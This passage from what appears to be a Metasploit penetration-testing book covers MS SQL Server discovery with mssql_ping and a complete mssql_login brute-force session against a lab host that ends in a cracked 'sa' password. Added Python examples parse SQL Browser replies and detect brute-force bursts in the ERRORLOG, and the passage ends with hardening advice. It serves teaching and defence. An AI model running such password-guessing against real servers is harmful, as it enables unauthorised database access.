Chapter 6

[*] SQL Server information for 192.168.33.130: 
[*]    ServerName      = IHAZSECURITY 
[*]    InstanceName    = SQLEXPRESS
[*]    IsClustered     = No
[*]    Version         = 9.00.1399.06 
[*]    tcp             = 1433 
[*]    np              = \\IHAZSECURITY\pipe\MSSQL$SQLEXPRESS\sql\query
[*] Scanned 129 of 256 hosts (050% complete)

After calling the mssql_ping module with use scanner/mssql/mssql_ping and setting our options, we see that a SQL Server installation is found at 192.168.33.130. The name of the server is IHAZSECURITY. Its version number 9.00.1399.06 equates to SQL Server 2005 Express, and we know that it's listening on TCP port 1433.
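The fields mssql_ping prints are lifted straight out of the SQL Server Browser service's reply on UDP 1434 (the SSRP protocol): a one-byte type 0x05, a two-byte little-endian length, and a single ASCII string of key;value pairs, one instance per ";;"-terminated record. The parser below is an added example, not code from the book or from the Metasploit module; it decodes that string into the same ServerName/InstanceName/Version/tcp/np fields, maps the major version to the product generation (9.x is SQL Server 2005, as the text notes), and runs against a constructed response that mirrors the values above. It is useful for an inventory script that records which instances and ports your own Browser services advertise.

```python
from __future__ import annotations

import struct

# Constructed SSRP SVR_RESP message (assumed, not captured from a real host);
# the key/value string mirrors the mssql_ping output shown above.
_PAYLOAD = (
    b"ServerName;IHAZSECURITY;InstanceName;SQLEXPRESS;IsClustered;No;"
    b"Version;9.00.1399.06;tcp;1433;"
    b"np;\\\\IHAZSECURITY\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;"
)
SAMPLE_RESPONSE = b"\x05" + struct.pack("<H", len(_PAYLOAD)) + _PAYLOAD

# Major version number -> product generation.
MAJOR_TO_PRODUCT = {
    8: "SQL Server 2000",
    9: "SQL Server 2005",
    10: "SQL Server 2008/2008 R2",
    11: "SQL Server 2012",
    12: "SQL Server 2014",
    13: "SQL Server 2016",
    14: "SQL Server 2017",
    15: "SQL Server 2019",
    16: "SQL Server 2022",
}


def parse_ssrp_response(data: bytes) -> list[dict[str, str]]:
    """Decode a Browser-service reply into one dict per advertised instance."""
    if len(data) < 3 or data[0] != 0x05:
        raise ValueError("not an SSRP SVR_RESP message")
    (size,) = struct.unpack_from("<H", data, 1)
    body = data[3:3 + size].decode("ascii", errors="replace")
    instances: list[dict[str, str]] = []
    for record in body.split(";;"):      # each instance ends with ";;"
        if not record:
            continue
        tokens = record.split(";")
        if len(tokens) % 2:
            raise ValueError("malformed record: odd number of key/value tokens")
        instances.append(dict(zip(tokens[0::2], tokens[1::2])))
    return instances


def product_name(version: str) -> str:
    """Translate e.g. '9.00.1399.06' into the product generation."""
    major = int(version.split(".")[0])
    return MAJOR_TO_PRODUCT.get(major, f"unknown (major version {major})")


def main() -> None:
    for inst in parse_ssrp_response(SAMPLE_RESPONSE):
        print(f"[*] SQL Server instance {inst.get('InstanceName')} on "
              f"{inst.get('ServerName')}: {product_name(inst['Version'])}, "
              f"tcp={inst.get('tcp', 'n/a')}")


if __name__ == "__main__":
    main()
```

Note that the reply is unauthenticated and the Browser service answers anyone who asks, which is why the tcp port of a named instance should not be treated as hidden just because it is not 1433.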

Brute Forcing MS SQL Server

Next, we brute force the server with the Framework's mssql_login module:

msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > show options

Module options:

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   PASSWORD                           no        The password for the specified username
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             1433             yes       The target port
   THREADS           1                yes       The number of concurrent threads
   USERNAME          sa               no        The username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mssql_login) > set PASS_FILE /pentest/exploits/fasttrack/bin/dict/wordlist.txt
PASS_FILE => /pentest/exploits/fasttrack/bin/dict/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.33.130
RHOSTS => 192.168.33.130
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > set verbose false
verbose => false
msf auxiliary(mssql_login) > exploit
[+] 192.168.33.130:1433 - MSSQL - successful login 'sa' : 'password123'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
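From the server's side, a run like the one above leaves a dense trail of error 18456 ("Login failed for user") entries in the SQL Server ERRORLOG, each tagged with the client address, and, if login auditing is set to record successes as well, a "Login succeeded" line from the same client once the wordlist hits. The detector below is an added example, not part of the book or of Metasploit; it parses a constructed ERRORLOG excerpt (the client address 192.168.33.1 and the timestamps are assumed), raises a "burst" alert when one client accumulates five failures inside a sixty-second window, and escalates to "success_after_failures" when a login from that client later succeeds, which is the pattern a completed password-guessing run produces.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed SQL Server ERRORLOG excerpt (assumed, not from a real host).
# Error 18456 State 8 is "password did not match"; the [CLIENT: ...] suffix
# carries the source address. The last line only appears when login auditing
# records successful logins.
SAMPLE_ERRORLOG = """\
2011-03-14 09:55:03.10 Logon       Error: 18456, Severity: 14, State: 8.
2011-03-14 09:55:03.10 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.50]
2011-03-14 10:02:11.41 Logon       Error: 18456, Severity: 14, State: 8.
2011-03-14 10:02:11.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.1]
2011-03-14 10:02:11.58 Logon       Error: 18456, Severity: 14, State: 8.
2011-03-14 10:02:11.58 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.1]
2011-03-14 10:02:11.73 Logon       Error: 18456, Severity: 14, State: 8.
2011-03-14 10:02:11.73 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.1]
2011-03-14 10:02:11.90 Logon       Error: 18456, Severity: 14, State: 8.
2011-03-14 10:02:11.90 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.1]
2011-03-14 10:02:12.06 Logon       Error: 18456, Severity: 14, State: 8.
2011-03-14 10:02:12.06 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.1]
2011-03-14 10:02:12.22 Logon       Error: 18456, Severity: 14, State: 8.
2011-03-14 10:02:12.22 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.33.1]
2011-03-14 10:02:12.39 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.168.33.1]
"""

_TS = r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
LOGIN_FAILED = re.compile(
    _TS + r"Login failed for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<client>[^\]]+)\]")
LOGIN_OK = re.compile(
    _TS + r"Login succeeded for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<client>[^\]]+)\]")


def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return alerts as (client, user, kind, failure_count) tuples.

    'burst' fires once per client when `threshold` failures land inside
    `window`; 'success_after_failures' fires when a login succeeds from a
    client that already tripped the burst rule."""
    recent = defaultdict(deque)   # client -> timestamps of recent failures
    tripped = set()               # clients that already raised a burst alert
    alerts = []
    for line in lines:
        m = LOGIN_FAILED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            q = recent[m["client"]]
            q.append(ts)
            while q and ts - q[0] > window:   # slide the window forward
                q.popleft()
            if len(q) >= threshold and m["client"] not in tripped:
                tripped.add(m["client"])
                alerts.append((m["client"], m["user"], "burst", len(q)))
            continue
        m = LOGIN_OK.match(line)
        if m and m["client"] in tripped:
            alerts.append((m["client"], m["user"], "success_after_failures",
                           len(recent[m["client"]])))
    return alerts


if __name__ == "__main__":
    for client, user, kind, count in detect_bruteforce(SAMPLE_ERRORLOG.splitlines()):
        print(f"[!] {kind}: {count} failed logins for '{user}' from {client}")
```

The single 'appuser' failure from 192.168.33.50 never reaches the threshold and produces nothing, while the 'sa' run raises both alerts. In practice this only works if the server logs failed logins at all (the default login audit level records failures; successes need the audit level raised), and the noise from a wordlist like the one used above is much smaller when 'sa' is disabled or renamed and SQL logins are created with CHECK_POLICY so that the Windows lockout policy applies to them.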